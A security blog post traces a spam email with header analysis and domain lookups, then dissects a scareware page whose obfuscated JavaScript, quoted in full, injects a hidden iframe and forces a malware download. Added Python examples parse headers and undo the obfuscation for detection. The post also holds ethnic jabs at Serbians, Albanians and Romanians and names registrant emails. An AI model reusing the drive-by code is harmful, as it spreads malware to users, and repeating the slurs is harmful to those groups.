I recently got an email in my Gmail account that did not get flagged by the spam filter, so I thought I would give a short explanation of what is going on, for those out there who keep getting bare links in their email but don't know why.
The suspect email was from a client I had built a website for in the past, and our previous correspondence is what kept Google from flagging it as spam. The email contained nothing but a link to what appeared to be an image on a blog. No big deal, but it was sent to multiple people with no other text, which is obviously not normal. The first thing to do is view the email in its original (raw) format. This exposes header information that the regular view hides. I have replaced all the names with placeholders. As you can see in the dump below, far more information is given. At first glance things look pretty kosher: the Return-Path is the same address as the sender, and the email went through a Hotmail server, which makes sense since Microsoft runs both MSN and Hotmail. The @phx.gbl Message-ID looks a little fishy until I do a bit of research into legitimate mail coming from MSN/Hotmail; it turns out that is normal.
Message-ID: BAY147-W17544747B957A173463B9ECA160@phx.gbl
HOWEVER, I know something is up when I look up the originating client address:
X-Originating-IP: [178.223.132.199]
And I get the following result: Latitude 44.818611, Longitude 20.468057, GMT+2.
Hmmmmm... That is a Telekom Srbija ADSL address, an ISP operating out of Belgrade, Serbia. The only legitimate thing to come out of Serbia is... ok, I don't know.
Anyhow, here is the whole email in the raw:
————————————————————————————————————
Delivered-To: XXXXXXX@gmail.com
Received: by 10.52.173.36 with SMTP id bh4csp84701vdc;
Thu, 10 May 2012 07:10:17 -0700 (PDT)
Received: by 10.50.10.225 with SMTP id l1mr2645909igb.1.1336659015564;
Thu, 10 May 2012 07:10:15 -0700 (PDT)
Return-Path:
Received: from bay0-omc3-s24.bay0.hotmail.com (bay0-omc3-s24.bay0.hotmail.com. [65.54.190.162])
by mx.google.com with ESMTP id gb6si1713633igc.61.2012.05.10.07.10.15;
Thu, 10 May 2012 07:10:15 -0700 (PDT)
Received-SPF: pass (google.com: domain of XXXXXXX@msn.com designates 65.54.190.162 as permitted sender) client-ip=65.54.190.162;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of XXXXXXX@msn.com designates 65.54.190.162 as permitted sender) smtp.mail=XXXXXXX@msn.com
Received: from BAY147-W17 ([65.54.190.189]) by bay0-omc3-s24.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
Thu, 10 May 2012 07:09:46 -0700
Message-ID:
Return-Path: XXXXXXX@msn.com
Content-Type: multipart/alternative;
boundary="_d0267811-62ef-48bf-9d36-2d29cb40d874_"
X-Originating-IP: [178.223.132.199]
From: XXXX XXXX
To:
Subject:
Date: Thu, 10 May 2012 07:09:46 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 10 May 2012 14:09:46.0808 (UTC) FILETIME=[8E307B80:01CD2EB6]
--_d0267811-62ef-48bf-9d36-2d29cb40d874_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
h t t p[:] / / projectorange.sg/wp-content/themes/twentyten/blog.php?total176.bmp
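Pulling those fields out programmatically, as an added example that is not part of the original post: the Python below parses a constructed copy of the headers above (modelled on them, with the post's placeholders; the From address is an assumption, since the page strips it), lists the relay hops from the Received chain, reads the SPF verdict and the IP it vouches for, and compares that with X-Originating-IP. The point it makes concrete is that the SPF "pass" covers the Hotmail relay 65.54.190.162, not 178.223.132.199, the address that logged into the webmail session; Hotmail records the latter only in X-Originating-IP, and nothing in the SPF result says anything about it.

```python
import re
from email import message_from_string

# Constructed sample modelled on the raw headers quoted above. Addresses are
# the post's own placeholders; the From address is assumed (the page strips it).
SAMPLE = """Delivered-To: XXXXXXX@gmail.com
Received: by 10.52.173.36 with SMTP id bh4csp84701vdc;
        Thu, 10 May 2012 07:10:17 -0700 (PDT)
Received: from bay0-omc3-s24.bay0.hotmail.com (bay0-omc3-s24.bay0.hotmail.com. [65.54.190.162])
        by mx.google.com with ESMTP id gb6si1713633igc.61.2012.05.10.07.10.15;
        Thu, 10 May 2012 07:10:15 -0700 (PDT)
Received-SPF: pass (google.com: domain of XXXXXXX@msn.com designates 65.54.190.162 as permitted sender) client-ip=65.54.190.162;
Received: from BAY147-W17 ([65.54.190.189]) by bay0-omc3-s24.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
        Thu, 10 May 2012 07:09:46 -0700
Return-Path: XXXXXXX@msn.com
X-Originating-IP: [178.223.132.199]
From: XXXX XXXX <XXXXXXX@msn.com>
Date: Thu, 10 May 2012 07:09:46 -0700

hxxp://projectorange.sg/wp-content/themes/twentyten/blog.php?total176.bmp
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# "from <host> ... [<ip>]": the host the relay announced and the IP it came from
HOP = re.compile(r"from\s+(\S+)\s.*?\[" + IPV4 + r"\]", re.S)
# "pass (...) client-ip=<ip>": the verdict and the one IP it applies to
SPF = re.compile(r"^\s*(\w+)\b.*?client-ip=" + IPV4, re.S)


def received_hops(msg):
    """Relay hops as (announced host, connecting IP). Received headers are
    prepended by each relay, so the first entry is the last hop before us."""
    hops = []
    for hdr in msg.get_all("Received", []):
        m = HOP.search(hdr)
        if m:  # the "by 10.x.x.x" internal Google hop has no 'from' and is skipped
            hops.append((m.group(1), m.group(2)))
    return hops


def spf_verdict(msg):
    m = SPF.search(msg.get("Received-SPF", ""))
    return (m.group(1), m.group(2)) if m else (None, None)


def originating_ip(msg):
    v = msg.get("X-Originating-IP")
    return v.strip("[] ") if v else None


def assess(raw):
    msg = message_from_string(raw)
    hops = received_hops(msg)
    result, spf_ip = spf_verdict(msg)
    origin = originating_ip(msg)
    hop_ips = {ip for _, ip in hops}
    findings = []
    if result == "pass" and spf_ip in hop_ips:
        findings.append("SPF pass vouches only for relay %s" % spf_ip)
    if origin and origin not in hop_ips:
        findings.append("X-Originating-IP %s is not a relay: it is the webmail "
                        "client, which SPF says nothing about" % origin)
    return {"hops": hops, "spf": (result, spf_ip),
            "originating_ip": origin, "findings": findings}


if __name__ == "__main__":
    for k, v in assess(SAMPLE).items():
        print(k, v)
```

Run it on any raw message saved from Gmail's "Show original"; the two findings are the whole story of this email: the sender's infrastructure is genuine and SPF-approved, and the person using it was not.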
Ok, let's take a look at the link now that we are paranoid...
projectorange.sg turns out to be legitimate enough, despite the sketchy name:
Network Solutions tells me it was registered on 16-Dec-2010 for a two-year term. Cons and spammers RARELY want to own a domain for more than a month, let alone two whole years. The contact is yihan666@yahoo.com, oOooo evil... The DNS servers are with dreamhost.com, and there doesn't appear to be any dynamic DNS or fast-flux action going on (fast flux lets malware pushers change the IP associated with a domain name every few minutes or hours, so that shutting them down is a real pain).
Next I check the site through URLVoid.com's online tool, which checks a URL against multiple scanners at once. I'm already guessing this isn't a nice .bmp image of a sunset from our Serbian friend (an assumption; in all reality he is probably from somewhere else in the former Soviet bloc and just bouncing off that server).
URLVoid’s results.
0/30 (0.00%) CLEAN, IP Address: 67.205.55.145
Wow, could it be that it really is an innocent site? Hell no. The last scan was on 5-5-2012, and I can assume the site got infected around the day I got my email (5-10-2012).
So I force URLVoid to rescan and... wtf... 0/31 CLEAN again!?! Maybe I should just go to the site? No. Why? First off, it came from Serbia. Do not trust them; just ask an Albanian.
So now I use URLVoid's content dump tool to see what code is there without executing it myself. Out of all the code I'll just point out some of the interesting bits. From a glance I can tell it is scareware: it tells you your computer is infected, and when you click on their "antivirus" product to clean it you actually download the malware. Here are some of the funny bits.
————————————————————————————————————
<div class="text1">To help protect your computer, Windows Web Secure Kit have detected Trojans and ready to remove them.</div>
<div class="virusname" id="hazardType">
<div class="virus_1_1">noise.dat</div>
<div class="virus_1_1">emptyregdb.dat</div>
<div class="virus_1_1">mpr.dll</div>
<div class="virus_1_1">ieakui.dll</div>
<div class="virus_1_1">SET3.tmp</div>
<div class="virus_1_1">country.sys</div>
<div class="virus_1_1">ahui.exe</div>
<div class="virus_1_1">popcinfo.dat</div>
<div class="virus_1_1">dsdmo.dll</div>
<div class="virus_1_1">Active Setup Log.txt</div>
</div>
Amazingly enough, this website knows which of your files are infected without ever having access to your computer (remember, I dumped this code through URLVoid, not from my own machine). The "infected files" are simply hard-coded in the HTML: a list of ordinary Windows file names chosen to look familiar.
function obu() {
    var ff=navigator.userAgent;
    var a="Firefox";
    ff=ff.indexOf(a);
    if (ff!=-1) ra2();   // Firefox users get sent straight to the download
    var o1 = 'Y'+'o'+''+'ur';
    var o3 = 'i'+'s a'+''+'t risk ';
    var o4 = 'o'+'f cr'+''+'ash. ';
    var o5 = 'Pr'+'ess'+''+' CANCEL ';
    var o6 = 't'+'o pre'+''+'vent it. ';
    return o1+' sy'+'s'+''+'tem '+o3+o4+o5+o6;
}
Here you can see more obfuscation, meant to evade scanners that match on the usual scareware and fake-AV keywords: quite a creative way to say "Your system is at risk of crash. Press CANCEL to prevent it." Note also the first few lines: if the User-Agent contains "Firefox", ra2() (the function that triggers the download, shown further down) is called straight away, before the fake warning is even built.
<div class="text2" id="text2"></div>
<div class="remove" onClick="ra2();return false;"></div>
<div class="cancel" onClick="ra2();return false;"></div>
</div>
Let the program "remove" the files or say cancel: both buttons call the same ra2(), so either way it does the same thing. The power of choice... That's why you should always get out of a prompt like this with Ctrl+Alt+Delete and the Task Manager rather than clicking anything in it. Also worth noting: clicking the link lands you on blog.php, since the .bmp image doesn't exist. I can type blog.php?blahblahblah.jpg and it still resolves to the blog.php code; the query string is ignored, and the .bmp is there only to make victims think they are about to view an image. In just the last 24 hours the attacker had modified his drive-by download code from:
function rand1(){
    var h1 = '<if'+''+'rame ';
    var i1 = 'src="down'+''+'load/" ';
    var t1 = 'style="'+'';
    var o1 = 'width: 0px; '+'';
    var a1 = 'height: 0px; '+'';
    var l1 = 'border: 0px;'+'';
    var ll1 = l1+'"></if'+''+'rame>';
    document.getElementById('rand1here').innerHTML = h1+i1+t1+o1+a1+ll1;
}
Which is an obfuscated way of inserting an invisible (0 by 0 pixel, borderless) iframe pointing at the download/ directory, which no doubt holds the payload. The obfuscation is there to evade signature-based detection by HIDS and AV/endpoint protection products, and it must be working, because 0/31 scanners thought anything fishy was going on.
The attacker must have seen his download numbers drop, because today he replaced the obfuscated iframe code with just this snippet:
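To show what a scanner has to do to see through this trick, here is an added Python example (mine, not code from the attacker's page or from this post): a small normaliser that merges adjacent JavaScript string literals, inlines var assignments whose value has collapsed to a single literal, and repeats until nothing changes, then runs a keyword check before and after. It is applied to the obu() and rand1() snippets quoted above, copied in as constructed samples with the quotes straightened. A keyword scanner run on the raw text sees neither "iframe" nor "at risk"; the same scanner on the normalised text finds both. It handles only the concatenation trick these snippets use, not eval/unescape-style packing.

```python
import re

# Constructed samples: the attacker's obu() and rand1() as quoted above,
# with the curly quotes straightened so they are valid JavaScript.
OBU = r"""function obu() {
var ff=navigator.userAgent;
var a="Firefox";
ff=ff.indexOf(a);
if (ff!=-1) ra2();
var o1 = 'Y'+'o'+''+'ur';
var o3 = 'i'+'s a'+''+'t risk ';
var o4 = 'o'+'f cr'+''+'ash. ';
var o5 = 'Pr'+'ess'+''+' CANCEL ';
var o6 = 't'+'o pre'+''+'vent it. ';
return o1+' sy'+'s'+''+'tem '+o3+o4+o5+o6;
}"""

RAND1 = r"""function rand1(){
var h1 = '<if'+''+'rame ';
var i1 = 'src="down'+''+'load/" ';
var t1 = 'style="'+'';
var o1 = 'width: 0px; '+'';
var a1 = 'height: 0px; '+'';
var l1 = 'border: 0px;'+'';
var ll1 = l1+'"></if'+''+'rame>';
document.getElementById('rand1here').innerHTML = h1+i1+t1+o1+a1+ll1;
}"""

# One JS string literal, single or double quoted, with backslash escapes.
STR = r"""(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")"""
# Two or more literals joined by '+', e.g. 'if'+''+'rame'.
CONCAT = re.compile(STR + r"(?:\s*\+\s*" + STR + r")+")
# var name = 'single literal';  (matches only once concatenation has collapsed)
DECL = re.compile(r"var\s+(\w+)\s*=\s*(" + STR + r")\s*;")
KEYWORDS = ("iframe", "download/", "at risk", "trojan")


def _unquote(lit):
    return re.sub(r"\\(.)", r"\1", lit[1:-1])


def _quote(text):
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def collapse_concats(src):
    """Merge every run of adjacent string literals into one literal."""
    def merge(m):
        return _quote("".join(_unquote(p) for p in re.findall(STR, m.group(0))))
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(merge, src)
    return src


def _sub_outside_strings(src, pattern, replacement):
    """Apply pattern -> replacement to code only, never inside literals."""
    parts = re.split("(" + STR + ")", src)  # odd indices are the literals
    return "".join(p if i % 2 else pattern.sub(lambda _: replacement, p)
                   for i, p in enumerate(parts))


def deobfuscate(src):
    """Collapse concatenations and inline literal-valued vars to a fixpoint."""
    while True:
        new = collapse_concats(src)
        for name, lit in DECL.findall(new):
            # replace uses of the var, but not its own 'var name =' declaration
            use = re.compile(r"(?<!var )\b" + re.escape(name) + r"\b")
            new = _sub_outside_strings(new, use, lit)
        if new == src:
            return new
        src = new


def keyword_hits(src):
    """What a naive keyword scanner would flag in this text."""
    low = src.lower()
    return [k for k in KEYWORDS if k in low]


if __name__ == "__main__":
    for sample in (OBU, RAND1):
        print("raw  :", keyword_hits(sample))
        print("clean:", keyword_hits(deobfuscate(sample)))
        print(deobfuscate(sample), "\n")
```

Substitution deliberately skips the inside of string literals, so a literal that happens to contain a variable's name is left alone; the fixpoint loop is what resolves chains like ll1 = l1 + ..., where a var only becomes a single literal after another var has been inlined.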
function ra2(){
    document.getElementById('raif').src='download/';
}
I hope it's working out for him... The rest of the code is just a bogus malware scanner that cycles through random file names and pretends to scan while you download the real malware. Now let's go visit the attack code in a virtual machine running XP SP2 and the ever-vulnerable Internet Explorer. AV and firewall are off; let's see what happens...

An immediate redirect to the7news.com with a forced download of Adobe Flash Player. The fake scanner didn't pop up, probably because it was looking for a particular IE version with a well-known vulnerability, so it moved on to the next stage of the scam. The crooks appear to have taken the time to get their phony Flash Trojan digitally signed... or is this a legitimate Flash installer? Going to Adobe and comparing the certificate on their download, everything appears the same except the file signing date. Adobe signed theirs in early April, but this one was signed at the end of the month, with VeriSign as the CA. Odd, but maybe a new update/build came out at the end of the month. Running the file gives the executable name Install_Flash_Player_AIH.exe, and it is coming from the legitimate Adobe server (aihdownload.adobe.com). With the file properly signed by Adobe it seems legit, unless of course a certificate authority has been compromised (which happened a few times last year).
Let's dig into "the7news.com".
URLVoid says 2/31 engines detect malware. What is alarming is that MOST of the mainstream scanners gave it a green light as infection-free. The domain was bought on May 8th, two days before I got the spam. Looking up the IP it resolves to gives us the following:
46.108.132.130
No location info... So we are probably dealing with a domain whose IP changes constantly to keep the hosting servers from getting shut down. Compromised victim machines can be used to host both the domains and the malicious code being pushed.
The domain name itself?
The the7news.com domain is owned by Mitich Vladko, who resides in Bucharest, Romania and can be contacted at vladkomitill@ymail.com; no doubt just another honest Romanian trying to help people out with work-at-home schemes. Right...
The site has a large collection of .js popups designed to annoy you into staying, but more than anything it is just a nuisance. If you click on any of the links you get redirected to scams at businesssystemworld.com, obviously an affiliate getting a kickback, if it isn't owned by the same person.
So let's figure out whether the Flash download is legit or malware...
I've got netstat running on the victim box while it holds an active connection to the suspected server (46.108.132.130). Let's see if anything gets downloaded from another IP.
Surprisingly, no outbound traffic out of the ordinary occurred, and all signs point to it actually being a legitimate Flash download, which renews my faith in VeriSign certificates. Ok, let's look at businesssystemworld.com, the site I'm being funneled towards. When I get there it says I need the NEWER version of Flash. Newer than the legit new one I just got? I'm interested... Clicking the Flash prompt launches some JavaScript that forwards me to pay for a work-at-home kit, which then takes me to an order form with an invalid certificate (which Internet Explorer caught; don't ignore certificate warnings).
Oh wow, this cert was issued the day before I received my spam! These operations typically only last a week or two before they move on to the next set of domains. Notice that the cert does not chain up to any trusted root CA. Basically it is saying: yeah, it's encrypted, but who the hell knows who is on the other side...

Once again, this IP (178.162.248.20) traces back to no one. That's not an accident. More to the point, they issued themselves the certificate instead of getting one from a registered certificate authority like VeriSign.
The "legit" order form looks nice enough if you are gullible, I suppose. I love all the emphasis on security.

I'm not going to go through with a purchase, but they probably take the one charge and then tack you onto a monthly plan buried in the fine print. They typically don't want to anger you enough that you call your credit card company for a refund.
In my next post I will try to visit the initial attack code with a more vulnerable setup, to actually get the malware onto my system instead of merely being sent to a scam site. I'm also going to do a post tomorrow to try to figure out what vulnerability on the original site led to its compromise.